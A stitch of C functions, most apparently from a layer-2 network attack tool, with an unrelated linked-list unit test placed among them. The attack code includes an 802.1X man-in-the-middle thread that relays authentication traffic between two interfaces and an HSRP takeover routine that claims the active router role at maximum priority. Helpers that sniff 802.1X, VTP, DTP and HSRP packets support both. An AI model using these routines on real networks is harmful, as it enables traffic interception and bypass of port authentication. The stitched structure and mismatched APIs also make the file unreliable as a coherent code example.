void
gtk_c_toggle_interface(GtkWidget *toggle, struct term_node *node)
{
gboolean state;
const gchar *label;
dlist_t *found;
struct interface_data *iface_data, *iface_new;
label = gtk_button_get_label(GTK_BUTTON(toggle));
state = gtk_toggle_button_get_active(GTK_TOGGLE_BUTTON(toggle));
if (!state) {
found = dlist_search(node->used_ints->list, node->used_ints->cmp, (void *)label);
iface_data = (struct interface_data *) dlist_data(found);
interfaces_disable(iface_data->ifname);
node->used_ints->list = dlist_remove(node->used_ints->list, (void *)iface_data);
} else {
/* First we need to get the interface index */
found = dlist_search(interfaces->list, interfaces->cmp, (void *)label);
if (!found) /* Not found */
return;
iface_data = (struct interface_data *) dlist_data(found);
interfaces_enable(iface_data->ifname);
iface_new = (struct interface_data *) calloc(1, sizeof(struct interface_data));
memcpy((void *)iface_new, (void *)iface_data, sizeof(struct interface_data));
node->used_ints->list = dlist_append(node->used_ints->list, (void *)iface_new);
}
}
static int dlist_int_test()
{
printf("double list test ... MAX=%d\n", MAX);
int arr[MAX];
int i;
int sum = 0;
int max = INT_MIN;
printf("MAX = %d\n", MAX);
struct dlist *list = dlist_init();
if (list) {
/*
* init arr
*/
for (i = 0; i < MAX; i++) {
arr[i] = i;
}
/*
* dlist_add/dlist_length test
*/
for (i = 0; i < MAX; i++) {
dlist_add(list, arr + i);
assert(dlist_length(list) == i + 1);
}
/*
* dlist_serch test
*/
for (i = 0; i < MAX; i++) {
assert(dlist_search(list, arr + i) == DLIST_RET_OK);
}
/*
* dlist_printf test
*/
assert(dlist_printf(list, user_printf) == DLIST_RET_OK);
assert(dlist_foreach(list, sum_cb, &sum) == DLIST_RET_OK);
assert(dlist_foreach(list, max_cb, &max) == DLIST_RET_OK);
/*
* dlist_delete test
*/
for (i = MAX - 1; i >= 0; i--) {
assert(dlist_length(list) == i + 1);
assert(dlist_delete(list, arr + i) == DLIST_RET_OK);
assert(dlist_length(list) == i);
}
/*
* dlist_destroy test
*/
assert(dlist_destroy(list) == DLIST_RET_OK);
}
printf("sum = %d\n", sum);
printf("max = %d\n", max);
return 0;
}
int8_t
dot1x_learn_packet(struct attacks *attacks, char *iface, u_int8_t *stop, void *data, struct pcap_pkthdr *header)
{
struct dot1x_data *dot1x_data;
struct pcap_data pcap_aux;
u_int8_t *packet, got_802_1x_pkt = 0;
u_int16_t *cursor;
dlist_t *p;
struct interface_data *iface_data;
dot1x_data = data;
if ((packet = calloc(1, SNAPLEN)) == NULL)
return -1;
if (iface) {
p = dlist_search(attacks->used_ints->list, attacks->used_ints->cmp, iface);
if (!p)
return -1;
iface_data = (struct interface_data *) dlist_data(p);
}
else
iface_data = NULL;
while (!got_802_1x_pkt && !(*stop))
{
interfaces_get_packet(attacks->used_ints, iface_data, stop, header, packet, PROTO_DOT1X, NO_TIMEOUT);
if (*stop)
{
free(packet);
return -1;
}
cursor = (u_int16_t *)(packet + 12);
pcap_aux.header = header;
pcap_aux.packet = packet;
if (!dot1x_load_values((struct pcap_data *)&pcap_aux, dot1x_data))
got_802_1x_pkt = 1;
} /* While got */
free(packet);
return 0;
}
int8_t
vtp_learn_packet(struct attacks *attacks, char *iface, u_int8_t *stop, void *data, struct pcap_pkthdr *header)
{
struct vtp_data *vtp_data;
struct pcap_data pcap_aux;
u_int8_t *packet, *cursor, got_vtp_packet = 0;
dlist_t *p;
struct interface_data *iface_data;
vtp_data = data;
if ((packet = calloc(1, SNAPLEN)) == NULL)
return -1;
if (iface) {
p = dlist_search(attacks->used_ints->list, attacks->used_ints->cmp, iface);
if (!p)
return -1;
iface_data = (struct interface_data *) dlist_data(p);
} else {
iface_data = NULL;
}
while (!got_vtp_packet && !(*stop))
{
interfaces_get_packet(attacks->used_ints, iface_data, stop, header, packet, PROTO_VTP, NO_TIMEOUT);
if (*stop)
{
free(packet);
return -1;
}
cursor = (packet + LIBNET_802_3_H + LIBNET_802_2_H);
pcap_aux.header = header;
pcap_aux.packet = packet;
if (!vtp_load_values((struct pcap_data *)&pcap_aux, vtp_data))
got_vtp_packet = 1;
} /* While got */
free(packet);
return 0;
}
int8_t dtp_learn_packet( struct attacks *attacks, char *iface, u_int8_t *stop, void *data, struct pcap_pkthdr *header )
{
struct dtp_data *dtp_data = (struct dtp_data *)data;
struct interface_data *iface_data = NULL ;
struct pcap_data pcap_aux;
u_int8_t *packet, got_dtp_packet = 0;
dlist_t *p;
int8_t ret = -1 ;
if ( iface)
{
p = dlist_search(attacks->used_ints->list, attacks->used_ints->cmp, iface);
if ( !p )
return -1;
iface_data = (struct interface_data *) dlist_data(p);
}
packet = (u_int8_t *)calloc( 1, SNAPLEN );
if ( packet )
{
while ( !got_dtp_packet && !(*stop) )
{
interfaces_get_packet( attacks->used_ints, iface_data, stop, header, packet, PROTO_DTP, NO_TIMEOUT );
if ( !(*stop) )
{
pcap_aux.header = header;
pcap_aux.packet = packet;
if ( !dtp_load_values( (struct pcap_data *)&pcap_aux, dtp_data ) )
{
ret = 0 ;
got_dtp_packet = 1;
}
}
}
free(packet);
}
return ret ;
}
int8_t hsrp_learn_packet( struct attacks *attacks, char *iface, u_int8_t *stop, void *data, struct pcap_pkthdr *header,
struct pcap_data *pcap_aux)
{
struct hsrp_data *hsrp_data = (struct hsrp_data *)data;
struct interface_data *iface_data = NULL ;
u_int8_t got_hsrp_packet = 0;
u_int8_t *packet;
dlist_t *p;
int8_t ret = -1 ;
if ( iface )
{
p = dlist_search( attacks->used_ints->list, attacks->used_ints->cmp, iface );
if ( !p )
return -1;
iface_data = (struct interface_data *) dlist_data(p);
}
packet = calloc( 1, SNAPLEN );
if ( packet )
{
while ( !got_hsrp_packet && !(*stop) )
{
interfaces_get_packet( attacks->used_ints, iface_data, stop, header, packet, PROTO_HSRP, NO_TIMEOUT );
if ( !(*stop) )
{
pcap_aux->header = header;
pcap_aux->packet = packet;
if ( !hsrp_load_values( pcap_aux, hsrp_data ) )
{
got_hsrp_packet = 1;
ret = 0 ;
}
}
}
free(packet);
}
return ret;
}
/*
* 802.1X MitM simple attack.
* You'll need 2 network interfaces, 1 attached
* to the supplicant device and the other attached
* to the authenticator device.
*/
void dot1x_th_mitm( void *arg )
{
struct attacks *attacks = (struct attacks *)arg;
struct attack_param *param = (struct attack_param *)attacks->params;
sigset_t mask;
struct pcap_pkthdr header;
struct libnet_802_3_hdr *ether;
struct timeval now;
struct dot1x_mitm_ifaces mitm_ifaces;
struct interface_data *iface;
dlist_t *p;
u_int8_t *packet;
pthread_mutex_lock(&attacks->attack_th.finished);
pthread_detach(pthread_self());
sigfillset(&mask);
if (pthread_sigmask(SIG_BLOCK, &mask, NULL))
{
thread_error("dot1x_th_mitm pthread_sigmask()",errno);
dot1x_th_mitm_exit(attacks);
}
p = dlist_search(attacks->used_ints->list, attacks->used_ints->cmp, param[DOT1X_MITM_IFACE_AUTH].value);
mitm_ifaces.auth = (struct interface_data *) dlist_data(p);
p = dlist_search(attacks->used_ints->list, attacks->used_ints->cmp, param[DOT1X_MITM_IFACE_SUPP].value);
mitm_ifaces.supp = (struct interface_data *) dlist_data(p);
if (!mitm_ifaces.auth || !mitm_ifaces.supp)
{
if (!mitm_ifaces.auth)
write_log(0,"Ooops!! Interface %s not existent!!\n",param[DOT1X_MITM_IFACE_AUTH].value);
else
write_log(0,"Ooops!! Interface %s not existent!!\n",param[DOT1X_MITM_IFACE_SUPP].value);
write_log(0," Have you enabled the interface? Sure?...\n");
dot1x_th_mitm_exit(attacks);
}
gettimeofday(&now,NULL);
header.ts.tv_sec = now.tv_sec;
header.ts.tv_usec = now.tv_usec;
if ((packet = calloc(1, SNAPLEN)) == NULL)
dot1x_th_mitm_exit(attacks);
/* Get Authenticator MAC address... */
interfaces_get_packet(attacks->used_ints, mitm_ifaces.auth, &attacks->attack_th.stop, &header, packet, PROTO_DOT1X, NO_TIMEOUT );
if (attacks->attack_th.stop)
{
free(packet);
dot1x_th_mitm_exit(attacks);
}
ether = (struct libnet_802_3_hdr *) packet;
write_log(0, " Authenticator MAC = %02X:%02X:%02X:%02X:%02X:%02X\n",
ether->_802_3_shost[0], ether->_802_3_shost[1], ether->_802_3_shost[2],
ether->_802_3_shost[3], ether->_802_3_shost[4], ether->_802_3_shost[5]);
memcpy((void *)mitm_ifaces.mac_auth,(void *)ether->_802_3_shost,6);
/* Get supplicant MAC address */
interfaces_get_packet( attacks->used_ints, mitm_ifaces.supp, &attacks->attack_th.stop, &header, packet, PROTO_DOT1X, NO_TIMEOUT );
if (attacks->attack_th.stop)
{
free(packet);
dot1x_th_mitm_exit(attacks);
}
ether = (struct libnet_802_3_hdr *) packet;
write_log(0, " Supplicant MAC = %02X:%02X:%02X:%02X:%02X:%02X\n",
ether->_802_3_shost[0], ether->_802_3_shost[1], ether->_802_3_shost[2],
ether->_802_3_shost[3], ether->_802_3_shost[4], ether->_802_3_shost[5]);
memcpy((void *)mitm_ifaces.mac_supp,(void *)ether->_802_3_shost,6);
/* Ok... Now start the funny bridging side... */
while( !attacks->attack_th.stop )
{
iface = interfaces_get_packet(attacks->used_ints,
NULL,
&attacks->attack_th.stop,
&header,
packet,
PROTO_DOT1X,
NO_TIMEOUT);
if (attacks->attack_th.stop)
break;
ether = (struct libnet_802_3_hdr *) packet;
/* Authenticator interface? */
if (iface->libnet_handler == mitm_ifaces.auth->libnet_handler)
{
if (!memcmp(mitm_ifaces.mac_supp,ether->_802_3_shost,6) )
continue; /* Oops!! Its our packet... */
dot1x_send_raw(mitm_ifaces.supp, (packet+LIBNET_802_3_H), (header.len-LIBNET_802_3_H), mitm_ifaces.mac_auth, mitm_ifaces.mac_supp);
continue;
}
/* Supplicant interface? */
if (iface->libnet_handler == mitm_ifaces.supp->libnet_handler)
{
if (!memcmp(mitm_ifaces.mac_auth,ether->_802_3_shost,6) )
continue; /* Oops!! Its our packet... */
dot1x_send_raw(mitm_ifaces.auth, (packet+LIBNET_802_3_H), (header.len-LIBNET_802_3_H), mitm_ifaces.mac_supp, mitm_ifaces.mac_auth);
continue;
}
}
free(packet);
dot1x_th_mitm_exit(attacks);
}
void hsrp_th_become_active( void *arg )
{
struct attacks *attacks = (struct attacks *)arg;
struct hsrp_data *hsrp_data = (struct hsrp_data *)attacks->data;
struct attack_param *param = attacks->params;
struct interface_data *iface_data;
struct timeval now;
sigset_t mask;
struct pcap_pkthdr header;
struct pcap_data pcap_aux;
u_int32_t lbl32;
dlist_t *p;
pthread_mutex_lock(&attacks->attack_th.finished);
pthread_detach(pthread_self());
sigfillset(&mask);
if (pthread_sigmask(SIG_BLOCK, &mask, NULL))
{
thread_error("hsrp_send_discover pthread_sigmask()",errno);
hsrp_th_become_active_exit(attacks);
}
gettimeofday(&now,NULL);
header.ts.tv_sec = now.tv_sec;
header.ts.tv_usec = now.tv_usec;
if ( ! hsrp_learn_packet( attacks, NULL, &attacks->attack_th.stop, attacks->data,&header, &pcap_aux ) )
{
hsrp_data->opcode = HSRP_TYPE_COUP;
hsrp_data->state = HSRP_STATE_SPEAK;
if ( attacks->attack == HSRP_ATTACK_BECOME_ACTIVE )
memcpy((void *)&hsrp_data->sip, (void *)param[HSRP_SOURCE_IP].value, 4);
else
if ( attacks->attack == HSRP_ATTACK_MITM_BECOME_ACTIVE )
{
/* Get interface's ip address */
p = dlist_search(attacks->used_ints->list, attacks->used_ints->cmp, pcap_aux.iface);
iface_data = (struct interface_data *) dlist_data(p);
hsrp_data->sip = ntohl(inet_addr(iface_data->ipaddr));
/* libnet fix */
lbl32 = ntohl(hsrp_data->sip);
memcpy((void *)&hsrp_data->sip, &lbl32, 4);
}
/* libnet fix */
hsrp_data->dip = inet_addr("224.0.0.2");
/* Max priority */
hsrp_data->priority = 0xFF;
hsrp_send_packet(attacks);
hsrp_data->opcode = HSRP_TYPE_HELLO;
hsrp_data->state = HSRP_STATE_ACTIVE;
if ( ! thread_create( &attacks->helper_th, &hsrp_send_hellos, attacks) )
{
while ( ! attacks->attack_th.stop )
thread_usleep( 200000 );
}
else
write_log( 0, "hsrp_th_become_active thread_create error\n" );
}
hsrp_th_become_active_exit(attacks);
}
